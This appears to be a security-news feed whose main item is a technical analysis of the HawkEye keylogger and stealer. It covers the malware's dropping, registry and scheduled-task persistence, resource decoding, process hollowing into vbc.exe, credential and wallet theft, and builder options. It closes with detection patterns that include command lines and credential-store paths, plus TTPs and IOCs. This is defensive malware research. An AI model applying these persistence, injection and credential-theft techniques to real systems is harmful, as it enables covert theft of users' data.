  • Conduct regular vulnerability assessment and penetration testing (VAPT) exercises to identify and remediate vulnerabilities in your systems. Complement these exercises with periodic security audits to ensure compliance with security policies and standards.

Conclusion

These vulnerabilities highlight the urgent need for security teams to prioritize patching critical vulnerabilities in major products and those that could be weaponized as entry points for wider attacks. With increasing discussions of these exploits on dark web forums, organizations must stay vigilant and proactive. Implementing strong security practices is essential to protect sensitive data and maintain system integrity.

The post IT Vulnerability Report: Exposed Fortinet Vulnerabilities Approach 1 Million appeared first on Cyble.

Blog – Cyble – ​Read More

HawkEye Malware: Technical Analysis

Editor’s note: The current article is authored by the threat researcher Aaron Jornet Sales, also know as RexorVc0. You can find him on X and LinkedIn. 

HawkEye, also known as PredatorPain (Predator Pain), is a malware categorized as a keylogger, but over the years, it has adopted new functionalities that align it with the capabilities of other tools like stealers.

History of HawkEye

HawkEye emerged before 2010, with records of its use and sale dating back to 2008, making it quite long-lived. After several spearphishing campaigns in which this well-known malware was attached, it gained significant popularity starting in 2013.

This keylogger has been available on various dark web sites, even having dedicated websites where the tool was sold. However, this keylogger has been cracked for years and used by different actors without going through the subscription method imposed by its creators, whose price ranged between $20 and $50. This has contributed to its continued notoriety, and it has been used not only by criminal actors but also by script kiddies due to its ease of use.

Although it is not one of the most widely used malwares, it remains in active use and saw a significant resurgence during the COVID period. During this time, certain actors took advantage of the general hysteria to obtain company data through phishing campaigns.

Additionally, HawkEye has been used in conjunction with other loaders and/or malware that invoked this keylogger. Over its long trajectory, various actors and malware have been involved in attacks on companies, some of which include Galleon Gold, Mikroceen, iSPY crypter related with Gold Skyline, Remcos used on campaigns with HawkEye, Pony used on campaigns with HawkEye, etc.

Technical Analysis

The method of HawkEye’s delivery has varied throughout its history, as have the types of sources behind the attacks. Nevertheless, it has been primarily involved in spearphishing campaigns, where attackers devised convincing scenarios to trick victims into downloading the malicious file, which could be a document, compressed file, or another malware acting as a loader for the keylogger.

It has also been used to target websites of portals typically accessed by companies, which were the main targets of the attacking groups. Another common method of spreading HawkEye was through “free” software, which turned out to be malware in disguise.

HawkEye’s delivery methods are quite diverse compared to other malware. However, its execution and behavior have remained relatively consistent over the years. A behavior graph of what has been observed in recent months would look as follows:

HawkEye graph

During the analysis process, I typically spend weeks, even months, collecting samples to understand how they function as a whole based on the existing variants. Therefore, we may observe variations among those presented. In most executions, we encounter enormous trees of processes based on their activities.

To simplify, as you’ve seen in the previous graph, it’s not as complex compared to other stealers or RATs. It generally consists of an executable that drops others in temporary paths, then injects code into one of them or into a .NET-related software. Later, in memory, it gathers all possible data and sends it to a C&C.

ProcDOT detonation chart

Going straight to the point, in an initial execution of one of the samples I analyzed, we see a rather extensive process—a succession of execution copies launched in temporary paths.

Process Tree execution (Image 1)
Process Tree execution (Image 2)

In this instance, they used the RoamingTemplates path, but this is highly variable depending on who created it. Generally speaking, they tend to abuse paths like AppDataRoaming and AppDataTemp, which are classic choices.

Paths commonly abused (Image 1)
Paths commonly abused (Image 2)
Paths commonly abused (Image 3)

Here’s the list of paths observed for dropping files:

  • C:Users<user>AppDataLocalTemp
  • C:Users<user>AppDataRoaming
  • C:Users<user>AppDataRoamingMicrosoftWindowsTemplates
  • C:Users<user>AppDataLocalTempSystem
  • C:Users<user>Music

All of these files that are launched, and which we’ve observed executing in the previous step, are copies of themselves. The filenames are also highly variable, as you might expect, but they often try to have an icon that makes the victim think it’s a legitimate program, or the malware description might be altered to make it seem like legitimate software.

Analyze malware and phishing threats
inside ANY.RUN’s Interactive Sandbox 



Try it now


Ultimately, after comparing the dropped files, we can see they are simple copies of the original, with the particularity that some versions launch them in hidden mode, so you can’t see them unless you’ve enabled the “View hidden files” function in Windows.

Hidden files duplication graph

During these file droppings, we can encounter both replicas of the original file in different paths, as well as support files whose functionality is typically to establish persistence (or check if it’s already done, and if not, do it) and to perform injector functions, which is a characteristic of this malware. In this case, the smaller binary is responsible for these actions.

Injector written in temporary folder

I check to see if there is any shared information between the two binaries and notice that certain parts of the code match the original. This will become relevant later, as right now we’re seeing them separately, but everything will make sense afterward.

Comparison of the injector and the Hawkeye bin

After this step, we can see how persistence is established. PredatorPain isn’t just a malware that establishes persistence once—it’s been observed to check and establish persistence up to three different times, depending on the phases (Loader > Injector > Payload).

This makes it clear that the malware is determined to persist on the system, one way or another. At this stage, to avoid revealing persistence mechanisms through strings, it obfuscates a string and then decodes it to introduce, in this case, one of the binaries launched earlier. This practice isn’t as common and adds a level of sophistication not found in other samples.

Hawkeye persistence in registers

Not only does it create persistence in the registry, but we also find samples that establish persistence in tasks using commands like the following:

schtasks.exe /Create /TN "<Path><TaskName>" /XML "<File>"

After observing its behavior in the early stages, we delve deeper into the entire execution thread throughout the analysis phase with debugging. I’ve followed several samples, and they’re mostly similar—samples in .NET, sometimes obfuscated with tools like Confuser, Eaz, Reactor, or similar, which are relatively easy to deobfuscate.

Hawkeye code obfuscated

In most samples, I noticed heavy interaction with resources, which will become crucial shortly since I observed a significant amount of data in these resources across most of the samples I found.

Resources data content (Image 1)
Resources data content (Image 2)

In the malware’s initial phases, it looks for the running process (which will be the previously prepared copy), where it will check the PID to access the resources. Within these resources, we see two distinct types of code: the initial part, which acts as a key, and the data chunk, which is what will be deobfuscated. To achieve this, it uses XOR + Poly, and at the end of the process, it extracts a Portable Executable.

Graph of binary load from resources

It can do this in various ways depending on the sample, but we see the same extraction of a binary from a resource as we do from obfuscated code in memory, like the example shown below.

Graph of PE extraction from memory

The result of this phase is two extracted files—one will be the injector, and the other will be the Keylogger.

Extracted Injector
Extracted Keylogger

I compared both files, and they’re entirely different, in size, in structure—the only common factor is that both are .NET binaries.

Binary comparison

To highlight the difference between the injector dropped on disk (Right) and the one extracted from memory (Left), we can compare the extended content. We can observe how the memory-extracted injector includes imports related to injection that the disk version doesn’t (such as ZwUnmapViewOfSection, VirtualAllocEx, WriteProcessMemory, etc.).

Extracted and dropped injector comparison
Extracted and dropped injector comparison

Here we can observe various functionalities while extracting the binaries, such as self-deletion. This is done to maintain evasion and avoid revealing its location, as it drops replicas of the original binary in various locations, as we saw earlier.

Self-deletion and self-copy of the original binary (Image 1)

Self-deletion and self-copy of the original binary
(Image 2)
Self-deletion and self-copy of the original binary (Image 3)
Self-deletion and self-copy of the original binary (Image 4)

One of the dropped files, the smaller one, acts as the injector. When extracted from memory, it has more functionalities than the one seen on disk. This is because the injection tasks are carried out during runtime, but the written file is actually a portion of this, triggering the main binary located in the temporary path.

It checks persistence and restarts the entire process, including injection. Therefore, it’s a part of the file without revealing all of its functionalities. I’ll show you how it performs injection using Process Hollowing.

Graph of the process injection

In essence, the injector doesn’t have much more functionality. It includes a phase where it checks running processes, which is an interesting technique to detect analysis tools or to determine if the process is already running. If not, it launches the process, adds it to the registry (as seen earlier), and restarts the execution.

Process collection routine (Image 1)
Process collection routine (Image 2)
Process collection routine (Image 3)

Lastly, we only have the second extraction left to observe, which is HawkEye itself. I’ve encountered many versions of it, as the modules included will vary significantly based on what the creator configures in the builder of the Keylogger itself.


Learn to analyze malware in a sandbox

Learn to analyze cyber threats

See a detailed guide to using ANY.RUN’s Interactive Sandbox for malware and phishing analysis



We’ll talk more about this later, but you can see all the functionalities that can be added during its creation, which will impact the modules incorporated into it.

Comparison between crack and extracted keylogger features (Image 1)
Comparison between crack and extracted keylogger features (Image 2)

At this point, I conducted tests with several builders to verify this theory, as I had extracted multiple samples to the final phase, and almost none of them resembled each other too much. I tested by removing or adding options, and even with the same sample, there were significant differences, so you can imagine how different it can be if it’s not exactly the same version of the keylogger and different elements were selected during its creation.

Comparison between crack and extracted keylogger

At this stage, we just need to examine the payload’s functionalities. Upon first glance, we can see strings that reveal its nature—this sample didn’t expect anyone to reach this point, as it has three well-defined phases that conceal its tracks, but here we can see many indicators of what it is.


Overview of the extracted HawkEye
(Image 1)
Overview of the extracted HawkEye (Image 2)

During the execution of this specific module, we can observe it invoking vbc.exe as it injects the payload into this process, using the same techniques we’ve previously seen.

Execution of HawkEye’s final stage (Image 1)
Execution of HawkEye’s final stage (Image 2)
Execution of HawkEye’s final stage (Image 3)

Regarding the modules it brings, I compared three different samples, and they are quite similar in terms of what they can do. The general functionalities that typically match include:

  • Keylogging (Monitoring and stealing keyboard and clipboard data)
  • System information gathering (OS, HW, Network)
  • Credential theft (Mail, FTP, browsers, video games, etc.)
  • Wallet theft
  • Screenshot capture
  • Security software detection
  • Analysis tools detection (Dbg, traffic, etc.)
  • Persistence (usually via registry keys or Tasks)
  • Information exfiltration through various methods (FTP, HTTP, SMTP, etc.)
Graph of payload module diffing

Calling HawkEye a keylogger is really an oversimplification, as it performs more functions than many stealers I’ve seen. Once injected into vbc.exe or other processes, it carries out various actions mentioned above.

Graph of HawkEye functionality

Outro

As we discussed earlier, different groups have used this keylogger, as well as independent criminals or even script kiddies. In my research, I found different places where this keylogger was sold—there were up to 4-5 different sites, as it changed developers and domains over time, which is quite common.

HawkEye webpage

It has also been distributed through cracks, where it was sold or offered on forums to members, avoiding the usual membership fees or markets, offering it for very low payments compared to the standard price, which as we mentioned earlier, ranged from $20 to $50.

HawkEye product sales

It’s always important with these kinds of tools to locate the original software in different versions to understand how it works from both the victim’s and the attacker’s perspectives, so we can get a complete view of the malware

Here, we can see that the builder provides a multitude of configuration options, allowing us to choose where to send the stolen information (email, FTP, etc.), what we want to collect (browser info, FTP credentials, mail, etc.), whether to check for certain tools, establish persistence, delete data, download from a domain (this could function as a downloader for other malware), change the payload data to make it appear like legitimate software (e.g., changing the icon, description, etc.). As you can see, it’s incredibly comprehensive. After compiling, we’ll have our complete Keylogger, Stealer, or Downloader (call it what you will, as it does everything) ready to use.

Graph of HawkEye builder

I don’t want to repeat myself too much, but when comparing the versions we’ve seen and extracted with the ones we created ourselves, they function exactly the same—same injections, persistence, data theft (or whatever was chosen in the builder). Therefore, in telemetry, we won’t find any surprises, as you can see below.

Graph of HawkEye builded execution

After analyzing all of this, I hope you are as impressed as I am by the sheer versatility and longevity HawkEye has displayed over the decades. It’s truly a tremendously powerful and easy-to-use tool that, unfortunately, we will continue to see in security incidents from actors of all types.

Finally, I would like to thank you for reading this analysis and for supporting me.

About ANY.RUN  

ANY.RUN helps more than 500,000 cybersecurity professionals worldwide. Our interactive sandbox simplifies malware analysis of threats that target both Windows and Linux systems. Our threat intelligence products, TI Lookup, YARA Search and Feeds, help you find IOCs or files to learn more about the threats and respond to incidents faster.  

With ANY.RUN you can: 

  • Detect malware in seconds
  • Interact with samples in real time
  • Save time and money on sandbox setup and maintenance
  • Record and study all aspects of malware behavior
  • Collaborate with your team 
  • Scale as you need

Request free trial of ANY.RUN’s products →

Detection Opportunities

[TA0005][T1036] Duplication of original files in temporary paths

  • (WriteFile) C:Users<user>AppDataLocalTemp*.exe
  • (WriteFile) C:Users<user>AppDataRoaming*.exe
  • (WriteFile) C:Users<user>AppDataRoamingMicrosoftWindowsTemplates*.exe
  • (WriteFile) C:Users<user>AppDataLocalTempSystem*.exe
  • (WriteFile) C:Users<user>Music*.exe

[TA0003][T1053] Scheduled Task persistence

  • schtasks.exe /Create /TN “<Path><TaskName>” /XML “<TempPath><File>”

[TA0003][T1547.001] Registry Run Keys persistence

  • (Registry) HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionRun 
  • (ValueData) <Path Used on [TA0005][T1036] Duplication of original files in temporary paths>

[TA0005][T1055.012] Process injection on vbc or itself

  • From file in temporary folder > injection > vbc.exe 
  • From file in temporary folder > injection > Other unidentified file in same temporary path

[TA0009][T1074.001] Save stolen info on txt files

  • vbc.exe /stext “*AppDataLocalTempholdermail.txt”

[TA0009][T1113] Saving screenshots of the victim’s screen

  • (WriteFile / Regex NameFile) screenshotd{1}.jpeg

[TA0006][T1555] Queries to browser paths or third-party software to obtain user account information

  • (Registry/Path query) Web Data | login data | Accounts | Profiles  | Cookiesindex.dat | profiles.ini | *.oeaccount

TTPs

[TA0001][T1566.001] SpearPhishing

[TA0002][T1204] User Execution

[TA0003][T1053] Scheduled Task/Job

[TA0003][T1547.001] Registry Run Keys / Startup Folder

[TA0005][T1112] Modify Registry

[TA0005][T1564.001] Hidden Files and Directories

[TA0005][T1055] Process Injection

[TA0005][T1562] Impair Defenses

[TA0005][T1027] Obfuscated Files or Information

[TA0005][T1140] Deobfuscate/Decode Files or Information

[TA0005][T1036] Masquerading

[TA0005][T1497] Virtualization/Sandbox Evasion

[TA0006][T1552] Unsecured Credentials

[TA0006][T1555] Credentials from Password Stores

[TA0007][T1087] Account Discovery

[TA0007][T1518.001] Security Software Discovery

[TA0007][T1033] System Owner/User Discovery

[TA0007][T1012] Query Registry

[TA0007][T1016] System Network Configuration Discovery

[TA0007][T1518] Software Discovery

[TA0007][T1082] System Information Discovery

[TA0009][T1074.001] Local Data Staging

[TA0009][T1005] Data from Local System

[TA0009][T1560] Archive Collected Data

[TA0009][T1114] Email Collection

[TA0009][T1115] Clipboard Data

[TA0009][T1113] Screen Capture

[TA0011][T1105] Ingress Tool Transfer

[TA0011][T1071] Application Layer Protocol

[TA0011][T1571] Non-Standard Port

[TA0042][T1583.008] Malvertising

IOCs

60fabd1a2509b59831876d5e2aa71a6b

defc51f31f6c4fa89cc6a39a62d8a08f

dea59d578e0e64728780fb67dde7d96d

040058f70ffdee6398f7b64ae1ea46d3

e651dca5c850451cdba7f25cbb4134e7

de823ba5d67de8682e6d7b8b472dbbcb

25a2d98dfcf6a12ea6459882c56aa2e0

179b219afa2ac15b14affd399273148b

38a3cb547a0a19a61534792f572f08b0

addcd85e0126e63e46da09eb8ea97120

0a2f6501a36c1b13532139e3c1843109

addcd85e0126e63e46da09eb8ea97120

06916c9505da82f63a73768c6f336192

ab264deb2563dc4df8b281b18e0861ba

66[.]147[.]236[.]46

204[.]141[.]42[.]56

129[.]204[.]194[.]84

The post HawkEye Malware: Technical Analysis appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More